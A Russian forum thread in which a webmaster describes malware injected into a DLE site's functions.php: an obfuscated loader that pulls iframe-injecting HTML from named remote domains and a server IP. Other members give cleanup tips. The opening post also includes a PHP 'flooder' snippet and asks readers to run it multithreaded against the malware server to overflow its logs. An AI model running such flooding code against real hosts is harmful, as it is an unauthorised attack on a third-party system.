Новый вирус под DLE?

(Ответов: 4, Просмотров: 1059)
  1. Гуру Аватар для MetalMessiah
    • Регистрация: 19.04.2011
    • Сообщений: 745
    • Записей в дневнике: 4
    • Репутация: 189
    Обратился ко мне человек с просьбой помочь решить проблему.

    Ему Яндекс написал с неделю назад о вредоносном коде на одной из страниц сайта. Вредоносного кода он там в упор не увидел, потому просто удалил новость и отправил на перепроверку. Вчера ему снова Яндекс написал, уже 2 страницы - 1 (другая) новость и 1 теги.
    Движок DLE 9.3 под PHP 5.2.17.

    Я прошелся по датам создания файлов и обнаружил в engine/modules/functions.php дописанный следующий код:

    Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 1 сообщение(ий)):
    У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.

    (как он туда попал понятия не имею, шелл не нашел)

    Вообщем, если кому интересно покопайтесь :) Вкратце там обфускация 80 левела а суть в подгрузке файла с урла, параметром которого является ip посетителя и user-agent, в результате выдается html код, который echo до шаблона, т.е. в начале страницы. В нем JS который прописывает фрейм в котором уже вирусня.
    html код выдается псевдорандомный, зависит от браузера, грузится либо с kleopadla.no-ip.biz, либо с рандомного субдомена mybestinfo.pw.

    Код отдается турецким (неужели абузоустойчивым?) сервером 178.211.33.77.
    Вот такие дела. Чтобы не повадно было абузы уже отправлены, но прошу поддержать - написать еще парочку.

    А еще кому не лень прошу зациклить и запустить многопоточно вот такой код:

    флудер

    PHP код:
        if (rand(0,100)<30)
        {
            
    $ua="Mozilla/5.0 (Windows NT ".rand(5,6).".1; rv:".rand(20,24).".0) Gecko/".date("Ymd",strtotime("01.01.2010")+rand(0,365*3)*86400)." Firefox/".rand(5,24).".0";
        } else
        {
            
    $ua="Opera/".rand(8,11).".".rand(10,90)." (Windows NT ".rand(5,6).".1; U; ru) Presto/".rand(2,7).".6.".rand(10,90)." Version/".rand(8,11).".".rand(10,90);
        }
        
    $ip=rand(10,99).".".rand(1,200).".".rand(1,200).".".rand(1,200);
        echo 
    "$ip $ua<br>";
        
    $get="http://178.211.33.77/get_api.php?pid=2&br=".base64_encode($ua)."&ip=".base64_encode($ip);
        
    //echo $get."<br>\r\n";
        
    $str=file_get_contents($get); 
    [свернуть]

    авось база переполнится если логи ведутся. Все смахивает на связку, значит логи ведутся

    С Вами был М.М.
    • 1

    Спасибо сказали:

    TimKa(04.12.2013),
  2. Во все тяжкие Аватар для CuxpecT
    • Регистрация: 14.06.2011
    • Сообщений: 2,324
    • Репутация: 2030
    • Webmoney BL: ?
    старая няшка... было такое, решил путём замены данного файла на исходный, но сам вирус на сайте остался, так как запиливался он через аватары пользователей и прописывался рандомно в системные файлы php. Когда все файлы php были почищены и аватары пользователей удалены, а Яша всё равно ругался, был проведён более доскональный осмотр и остатки вредокода были найдены в файлах перевода .lng. После их чистки всё стало на свои места.
    бох смм
    • 0
  3. Гуру Аватар для MetalMessiah
    • Регистрация: 19.04.2011
    • Сообщений: 745
    • Записей в дневнике: 4
    • Репутация: 189
    Жаль, а я думал что-то новенькое...

    lng никто не менял, они 2011 года, в аватарах пхп кода не нашел - видимо самоуничтожение было.
    Дата изменения functions - сентябрь.
    • 0
  4. Super Moderator Аватар для grazer
    • Регистрация: 03.09.2009
    • Сообщений: 5,201
    • Записей в дневнике: 83
    • Репутация: 2382
    • Webmoney BL: ?

    Комментарий модератора: grazer

    1. ТС, на будущее, прошу называть темы в соответствии с их содержимым, чтобы модераторам не приходилось их править. За названия вроде "Новая няшка под DLE" - будем наказывать.
    Домены, хостинг и VPS 10 лет доверяю REG.RU. Проблем нет.
    Пишу про SEO в 2025 в телеграме, подписывайтесь (cнг/бурж seo).
    • 0
  5. Опытный
    • Регистрация: 25.05.2013
    • Сообщений: 312
    • Репутация: 32
    А где обфускация то?
    • 0

Тэги топика:

Похожие темы

Темы Раздел Ответов Последний пост
Вирус на DLE
DLE 14 29.11.2013 08:30
Вирус
DLE 21 01.07.2013 20:53
Вирус или нет
Консультации по безопасности 11 31.05.2013 15:43
Вирус на vk.com
Оффтоп и свободные темы 17 04.02.2013 21:01

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры